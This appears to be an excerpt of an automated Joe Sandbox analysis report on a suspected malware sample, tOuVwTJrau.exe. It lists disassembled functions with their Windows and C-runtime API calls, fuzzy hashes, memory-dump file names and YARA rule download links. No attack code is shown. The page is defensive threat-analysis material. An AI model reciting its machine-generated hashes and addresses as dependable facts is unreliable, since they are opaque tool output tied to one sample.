Instruction Fuzzy Hash: 6751A47259021AAFDB2A9F54CC82FFB37A9EF48750F265119F904EB141EB30DC9187A0

Function 00307500 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00307689
__Mtx_unlock.LIBCPMT ref: 0030769A
__Cnd_broadcast.LIBCPMT ref: 003076C0
__Mtx_unlock.LIBCPMT ref: 003076C6
Concurrency::cancel_current_task.LIBCPMT ref: 0030770F

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
String ID:
API String ID: 3354401312-0
Opcode ID: 878bf5474324c936245be4281577e5e93de648ef786412f60ed280739c7cca7b
Instruction ID: cb115d0b28dbc056ca03bde714d018d93843aa5210634c0807cc6b5e6d7b5f85
Opcode Fuzzy Hash: 878bf5474324c936245be4281577e5e93de648ef786412f60ed280739c7cca7b
Instruction Fuzzy Hash: 26618E74D02209DFDF15DFA4C964BAEBBB8BF05304F144169E805AB382DB35AA05CFA1

Function 00310BFC Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00310B2E), ref: 00310C1E
GetFileInformationByHandle.KERNEL32(?,?), ref: 00310C78
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00310B2E,?,000000FF,00000000,00000000), ref: 00310D06
__dosmaperr.LIBCMT ref: 00310D0D
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00310D4A

Part of subcall function 00310F72: __dosmaperr.LIBCMT ref: 00310FA7

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: a41c218c166030c7661966ff5409b4ccba9cf53350bc67e17269209c1a4dfa11
Instruction ID: 6e61c2afb634104f431cca2a50a71c6454f4f8cc08c5de19752ec1eedc8cf0d1
Opcode Fuzzy Hash: a41c218c166030c7661966ff5409b4ccba9cf53350bc67e17269209c1a4dfa11
Instruction Fuzzy Hash: D1413D75900208ABCB2DDFA5E8459EFBBF9EF8D300B144529F956D7611EA70A880CB21

Function 003212AB Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 003212C3

Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE

_free.LIBCMT ref: 003212D5
_free.LIBCMT ref: 003212E7
_free.LIBCMT ref: 003212F9
_free.LIBCMT ref: 0032130B

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 524cd053278f94c7c782215edb2b4f9e0c1a2416687927fb92a4a1cf18092529
Instruction ID: 73fa4288acec67ee93a3748c4b79f5c520d6cd659cc0e2cb0a7e5bafafb23e07
Opcode Fuzzy Hash: 524cd053278f94c7c782215edb2b4f9e0c1a2416687927fb92a4a1cf18092529
Instruction Fuzzy Hash: 06F0FF36504610A7C63ADF65F9C2C9A73EEEB96710B651C05F008EB611CF60FC804664

Function 002EDB20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00304A20: std::locale::_Init.LIBCPMT ref: 00304AB2

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 002EDD18

Strings

3, xrefs: 002EDD09, 002EDD10
`, xrefs: 002EDBB6
3, xrefs: 002EDCEB

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: InitIos_base_dtorstd::ios_base::_std::locale::_
String ID: `$3$3
API String ID: 3469404174-4666591
Opcode ID: 25c64388a9f98664a58c93f06bc209a08c72c5a9875fd14d366d5b9bc2cd71ae
Instruction ID: ebdf22fac0e276230673752c3eb8728efea7cf90062463a4ceb26fa7ffd501e1
Opcode Fuzzy Hash: 25c64388a9f98664a58c93f06bc209a08c72c5a9875fd14d366d5b9bc2cd71ae
Instruction Fuzzy Hash: 0C716C71A01248DFEB15DF68DD94F9DBBB4FF04304F5486A9E409AB281D775AA84CF40

Function 00312BB1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263

_free.LIBCMT ref: 00312C60
_free.LIBCMT ref: 00312C8E
_free.LIBCMT ref: 00312CD1

Strings

-1, xrefs: 00312BE7, 00312C31, 00312C6D, 00312BEA, 00312C34

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$ErrorLast
String ID: -1
API String ID: 3291180501-2512768585
Opcode ID: 0491f1a87dec2b9449a948f4716721543ec688b7a6609f4665973fc18a61785a
Instruction ID: 120083db3f4ec466c34465300cde9979fc4eaf7d9317a04367fa5f38ce9247f1
Opcode Fuzzy Hash: 0491f1a87dec2b9449a948f4716721543ec688b7a6609f4665973fc18a61785a
Instruction Fuzzy Hash: 8C414C316001059FD72ADFACCC81AAAB3E9FF4D314B25066DE555CB291EB31ECA09B90

Function 003195B5 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0031963F

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c17452bd9d257a50ccdb3366d6f14b865b7cd1596f197bae603c132cad26c692
Instruction ID: 2ba306fb7a93fafa94e9d584a47756e0034253f43314c9e05d83fb6325cb2da2
Opcode Fuzzy Hash: c17452bd9d257a50ccdb3366d6f14b865b7cd1596f197bae603c132cad26c692
Instruction Fuzzy Hash: 89B148319012559FDB1BCF28C8A1BEEBBE5EF5E350F25406BE845DB281D6358D81C760

Function 002E9A20 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,AA6E0749), ref: 002E9A99
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002E9B00
GetProcAddress.KERNEL32(00000000), ref: 002E9B07

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 501cde6347de95b0549c62ba3c97988ad0c83fc423bd01271b92d956a0bbfdf3
Instruction ID: 324aff219af54f2394c2e1ab82f67a64379cb3f14bc524d7d78ff50fa0ce47d1
Opcode Fuzzy Hash: 501cde6347de95b0549c62ba3c97988ad0c83fc423bd01271b92d956a0bbfdf3
Instruction Fuzzy Hash: 145157709602889BDB25EF29DD497DDBB78EF45304F9042AAE405AB3C1EB705AD0CB91

Function 00306210 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 003062E7
std::_Rethrow_future_exception.LIBCPMT ref: 00306339
std::_Rethrow_future_exception.LIBCPMT ref: 00306349

Part of subcall function 002E3A60: __Mtx_unlock.LIBCPMT ref: 002E3B54

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Mtx_unlockRethrow_future_exceptionstd::_
String ID:
API String ID: 3298230783-0
Opcode ID: c78eaef06a6f52717e4c39e64b970f63767ed0495abf0e0efd40872f02cb111a
Instruction ID: 20bd09d07ff80a835afd3aa848332d1dbf01e36d11d5809a396e49197f580481
Opcode Fuzzy Hash: c78eaef06a6f52717e4c39e64b970f63767ed0495abf0e0efd40872f02cb111a
Instruction Fuzzy Hash: 2C412C71D013489BCB16EBA4D852BAFBBB89F05300F40496DF54657682EB31A954C7A2

Function 0032757E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0032764E
_free.LIBCMT ref: 00327677
SetEndOfFile.KERNEL32(00000000,00323DDD,00000000,00324074,?,?,?,?,?,?,?,00323DDD,00324074,00000000), ref: 003276A9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00323DDD,00324074,00000000,?,?,?,?,00000000), ref: 003276C5

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: e4fe9f116b2b58d139c664a147ab03483ac388b46272a10db1f087500203f1bb
Instruction ID: 282e2b52bd0a570098d2be12e56ee5308513504ae2e3ae094e268c46f26bf587
Opcode Fuzzy Hash: e4fe9f116b2b58d139c664a147ab03483ac388b46272a10db1f087500203f1bb
Instruction Fuzzy Hash: BA41E936904A119BDB176BBCEC46BDD7B69FF49360F250514F924EB292DB30C8808761

Function 002E2F00 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 002E2F9F
GetCurrentThreadId.KERNEL32 ref: 002E2FAB
__Mtx_unlock.LIBCPMT ref: 002E2FF2
__Cnd_broadcast.LIBCPMT ref: 002E2FFB

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThread
String ID:
API String ID: 3264154886-0
Opcode ID: e67b34ac76bf0795112bd2692960ae78fb7a7aa87a086531f80dcb032253361e
Instruction ID: b531735928a76f142fd29a35e3ea7286c3f5ecd178b7fea15e4e515f91b0b39b
Opcode Fuzzy Hash: e67b34ac76bf0795112bd2692960ae78fb7a7aa87a086531f80dcb032253361e
Instruction Fuzzy Hash: 1F41EEB1A026129FCB12DF25D844B5AB7F8FF19311F00452AE91ACB791EB31EA14CBC1

Function 0031F3A3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0030ED48: _free.LIBCMT ref: 0030ED56

Part of subcall function 0031E84F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0031C9D2,?,00000000,00000000), ref: 0031E8FB

GetLastError.KERNEL32 ref: 0031F40B
__dosmaperr.LIBCMT ref: 0031F412
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0031F451
__dosmaperr.LIBCMT ref: 0031F458

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 4f8939037826f746097833c68f661c3fe0dbfaa85157eaf3528cbd77884f3c88
Instruction ID: 9551cd76afabe12d843ba34168133b7bda0f81da3358340b8c70ce43a00794ff
Opcode Fuzzy Hash: 4f8939037826f746097833c68f661c3fe0dbfaa85157eaf3528cbd77884f3c88
Instruction Fuzzy Hash: 5921D372600205AF9B2AAF668C80DEBB7ACEF0C3747158539F9699B550DB31ECC08760

Function 003171C0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
_free.LIBCMT ref: 00317222
_free.LIBCMT ref: 00317258
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a3dddd33151dd7cbdc9b2e9a3cbb76f212cf8a1a415c1db4f5d4ad5ddebb882e
Instruction ID: b36deb0daf38521f1b47ad6f6628319053d356d0528dd20f8e33a3692840c83a
Opcode Fuzzy Hash: a3dddd33151dd7cbdc9b2e9a3cbb76f212cf8a1a415c1db4f5d4ad5ddebb882e
Instruction Fuzzy Hash: 691191322082017BD71B2774AC82EEB25BE9BDF775B2A0B35F5209A5E2DD65CCC28115

Function 00317317 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00311657,002E2397), ref: 0031731C
_free.LIBCMT ref: 00317379
_free.LIBCMT ref: 003173AF
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00311657,002E2397), ref: 003173BA

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6264765a7abee6039c857840ecd3782e4610247dbf6932e1e7c3e40ace994bea
Instruction ID: 4152bef369722fefa9884389b8467512804be362fca7f0c3bdcc483e932d6c68
Opcode Fuzzy Hash: 6264765a7abee6039c857840ecd3782e4610247dbf6932e1e7c3e40ace994bea
Instruction Fuzzy Hash: 4E11A33A2082016BD71B2775AC86EEB256E97DF370B2D0B34F524DB1E1DD61CC8161A5

Function 0031A28F Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,00325D87,?,?,?,00000020,00000001), ref: 0031A2A5
GetLastError.KERNEL32(?,00325D87,?,?,?,00000020,00000001), ref: 0031A2AF
__dosmaperr.LIBCMT ref: 0031A2B6

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 0040a34cb1e2a63afe0f07ab138c1113c4bf38709aa16e476c8d3e69874edf04
Instruction ID: d9f796504d9c711a547aa5a47f7037366626bd1ced7bb40d79edeada829b113f
Opcode Fuzzy Hash: 0040a34cb1e2a63afe0f07ab138c1113c4bf38709aa16e476c8d3e69874edf04
Instruction Fuzzy Hash: 2BF08631601515BB8B2A1BA6CC08DC6BF6DFF4D7A17058510F519C7420DB32D8D1D7D1

Function 0031A2F8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,00325D12,?,?,?,?,00000020,00000001), ref: 0031A30E
GetLastError.KERNEL32(?,00325D12,?,?,?,?,00000020,00000001), ref: 0031A318
__dosmaperr.LIBCMT ref: 0031A31F

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: b0771fd8e249e0ec3e9cc158c3b6a261cedc5ac204974ca2953997ac285fa951
Instruction ID: 569314bdf53725cf9ac5746509797e1625b4339ad821de99001baa6deb7d6208
Opcode Fuzzy Hash: b0771fd8e249e0ec3e9cc158c3b6a261cedc5ac204974ca2953997ac285fa951
Instruction Fuzzy Hash: 07F06236601515BB8B2B1F66CC089CABF6DFF483A17154911F528C7420DB31E890DBD1

Function 003278EA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,003243D2,00000000,00000001,00000000,00000000,?,00317F36,?,?,00000000), ref: 00327901
GetLastError.KERNEL32(?,003243D2,00000000,00000001,00000000,00000000,?,00317F36,?,?,00000000,?,00000000,?,00318482,?), ref: 0032790D

Part of subcall function 003278D3: CloseHandle.KERNEL32(FFFFFFFE,0032791D,?,003243D2,00000000,00000001,00000000,00000000,?,00317F36,?,?,00000000,?,00000000), ref: 003278E3

___initconout.LIBCMT ref: 0032791D

Part of subcall function 00327895: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,003278C4,003243BF,00000000,?,00317F36,?,?,00000000,?), ref: 003278A8

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,003243D2,00000000,00000001,00000000,00000000,?,00317F36,?,?,00000000,?), ref: 00327932

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: fca5dd6c89a8aadabd00152eaf74e90bd76dc23329fe836c57dfb4cb6448a644
Instruction ID: aa012ffbfa3691176e9bd0183220ab719569c0f0c9716cfaf3cb5c741102e7a5
Opcode Fuzzy Hash: fca5dd6c89a8aadabd00152eaf74e90bd76dc23329fe836c57dfb4cb6448a644
Instruction Fuzzy Hash: DCF0C03A504165BBCF231FD5EC09ADA3F6AFB0A3A1F054414FA1DD9130DB729860DB91

Function 00314AF9 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00314B02

Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE

_free.LIBCMT ref: 00314B15
_free.LIBCMT ref: 00314B26
_free.LIBCMT ref: 00314B37

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 57aac8b364ce4aa44279414c1da1b56f7f2d61e104627811d0a5fc915cecd34a
Instruction ID: 989c1f1c2fb397c1e0ea79bbd02423cebab4c7709d9b486f63ec02696c5b6d48
Opcode Fuzzy Hash: 57aac8b364ce4aa44279414c1da1b56f7f2d61e104627811d0a5fc915cecd34a
Instruction Fuzzy Hash: BAE0BFBD8111209ACA176F15FC41AC7BA6EF78F760B02500BF4182E231DF3D65929F99

Function 0031385D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 003138ED

Strings

pow, xrefs: 003138C5, 003138E2

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 15322f0eeb26d6e41e346b898c67fdfc398c76a2346434e88e5688c9d124741e
Instruction ID: fa33365e2779b1af5a591b9641a891787dcb160b8820486075d8822d33339634
Opcode Fuzzy Hash: 15322f0eeb26d6e41e346b898c67fdfc398c76a2346434e88e5688c9d124741e
Instruction Fuzzy Hash: 89519B61A0820196CB1F7B14CD513FE6BA8EB5C750F218D69F8D1462A8FF36CDD89A42

Function 00313F62 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\tOuVwTJrau.exe, xrefs: 00313FA5, 00313FAC, 00313FE2

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

